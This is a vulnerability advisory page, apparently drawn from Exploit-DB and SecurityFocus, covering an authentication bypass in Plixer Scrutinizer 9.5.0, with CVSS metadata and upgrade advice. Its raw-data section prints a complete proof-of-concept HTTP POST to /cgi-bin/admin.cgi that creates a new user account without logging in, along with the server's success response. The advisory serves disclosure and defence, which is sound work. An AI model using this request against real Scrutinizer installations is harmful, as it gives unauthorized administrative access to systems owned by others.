Scrutinizer Authentication Bypass Vulnerability

vendor:

Scrutinizer

by:

SecurityFocus

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Scrutinizer

Affected Version From: 9.5.0

Affected Version To: 9.5.0

Patch Exists: YES

Related CWE: N/A

CPE: a:plixer:scrutinizer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Scrutinizer Authentication Bypass Vulnerability

Scrutinizer is prone to an authentication-bypass vulnerability. Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions. An attacker can send a specially crafted POST request to the vulnerable server to bypass authentication and gain access to the application.

Mitigation:

Upgrade to the latest version of Scrutinizer to mitigate this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/54727/info

Scrutinizer is prone to an authentication-bypass vulnerability.

Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.

Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. 

#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: 10.70.70.212
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70

tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1

#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8

{"new_user_id":"2"}